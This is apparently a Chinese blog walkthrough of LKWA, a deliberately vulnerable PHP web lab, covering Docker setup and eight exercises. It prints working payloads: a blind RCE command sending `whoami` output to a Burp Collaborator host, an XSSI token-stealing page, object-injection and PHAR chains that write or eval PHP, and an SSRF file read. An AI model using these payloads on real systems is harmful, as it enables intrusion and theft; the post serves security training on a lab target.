靶场推荐——LKWA

前言

最近在Github上面发现了一个不错的Web漏洞练习靶场——LKWA,它包含了八种Web漏洞:

  • Blind RCE
  • XSSI
  • PHP Object Injection
  • PHP Object Injection via Cookies
  • PHP Object Injection (Object Reference)
  • PHAR Deserialization
  • SSRF
  • Variables variable

项目地址:https://github.com/weev3/LKWA

搭建方法

官方部署

1
git clone https://github.com/weev3/LKWA

然后进入该目录下

1
docker-compose up

然后访问http://ip:3000即可。

注意

对于XSSI实验,需要把apache2.conf配置文件中的Allow Override None改成Allow Override ALL

对于PHAR Deserialization实验,需要把php.ini配置文件中的phar.readonly = On改成phar.readonly = Off

非官方部署

由于按照官方的搭建方法有的实验无法复现,所以重写了Dockerfile,并且配置文件也改好了。

镜像已上传到Dockerhub。

具体使用方法:

1
2
docker pull area39/lkwa:latest
docker run -d -p 3000:80 area39/lkwa:latest

然后访问http://ip:3000就能看到LKWA靶场啦。

实验复现方法

实验一:Blind RCE

blind_rce.php代码部分:

在第10行由POST方式传入user_input变量的值,然后使用exec函数执行了user_input值,并且没有回显输出。

此时我们可以结合Burpsuite Collaborato模块来查看输出。

Payload

1
ping `whoami`.xxx.burpcollaborator.com

实验二:XSSI

https://stackoverflow.com/questions/8028511/what-is-cross-site-script-inclusion-xssi

使用用户名admin密码password登录,然后可以看到用户名和随机token。

用户名和令牌是使用ajax检索的,如下所示:

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<title>XSSI</title>
</head>
<body>
<script>
function a(s)
{
alert(JSON.stringify(s));
}
</script>
<script src="http://ip:3000/api/user?callback=a"></script>
</body>
</html>

保存成xssi.php,在本地搭建好,然后访问该URL获取token。

实验三:PHP Object Injection

https://blog.csdn.net/qq_19876131/article/details/50926210

在该实验中,单击提交按钮后,一些序列化数据将会添加到url中,如下图所示:

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
class Foo{
function __construct($filename, $data) {
$this->filename = $filename;
$this->data = $data;
}
function __destruct(){
file_put_contents($this->filename, $this->data);
}
}

$a = new Foo("test.php","<?php phpinfo(); ?>");
echo serialize($a);
?>

然后运行上面的脚本

复制序列化的输出字符串,将其替换为object参数的值,然后发送请求。

然后就可以看到有个test.php文件被创建。

实验四:PHP Object Injection via Cookies

该实验与实验三相同,唯一的区别是对象注入发生在cookie中。

使用用户名admin密码password登录,一些序列化数据将添加到cookie中。

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

/**
* Object Injection via Cookie
*/
class Foo{
public $cmd;
function __construct() {
}
function __destruct(){
eval($this->cmd);
}
}

$a = new Foo();
$a->cmd = "phpinfo();";
echo serialize($a);
?>

然后将输出的字符串替换cookie(注意符号URL转义)。

实验五:PHP Object Injection (Object Reference)

看到一个输入框,随便输一个试试,他会提示Loser!!!!

代码部分:

如图所示,它让我们的输入数字和序列化数据,然后将输入的数字与随机生成的密码进行比较。如果输入的数字与该密码匹配,则表明Win,否则Loser。

明显这是不可能的,但是可以想办法绕开,从而获得Win。

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
class Object1
{
var $guess;
var $secretCode;
}

$a = new Object1();
$a->guess = &$a->secretCode;

echo serialize($a);

?>

实验六:PHAR Deserialization

https://www.freebuf.com/articles/web/182231.html

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
// create new Phar
@unlink("pharfile.phar");
$phar = new Phar('pharfile.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'data');
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// add object of any class as meta data
class log
{
function __wakeup(){
}
}
$object = new log;
$object->filename = 'shell.php';
$object->data = '<?php phpinfo();?>';
$phar->setMetadata($object);
$phar->stopBuffering();
?>

运行后会在本目录下生成一个pharfile.phar文件,然后把该文件上传

Payload

1
http://ip:3000/phar_deserial/phar_deserial.php?file=phar://uploads/pharfile.phar

实验七:SSRF

在输入框中输入一个图片的url,将会在页面中显示出来

代码部分:

1
2
3
4
5
6
7
<?php
include("sidebar.php");
if (isset($_GET['image'])) {
# code...
echo file_get_contents($_GET['image'], true);
}
?>

代码比较简单,也可以包含/etc/passwd之类的本地文件。

实验八:Variables variable

https://www.exploit-db.com/papers/13182

在输入框中输入一些值,然后就会var_dump输出你输入的值。

代码部分:

如果以GET方式传入funcinput的值,则将func的值添加到$var变量中,然后会将$var变量添加到动态变量中。

该动态变量可控,我们可以把var_dump换成assert或者passthru等等。


文章作者: Linuz
文章链接: https://linuz.me/2020/01/22/LKWA/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Linuz's Blog
敢不敢赏脸一次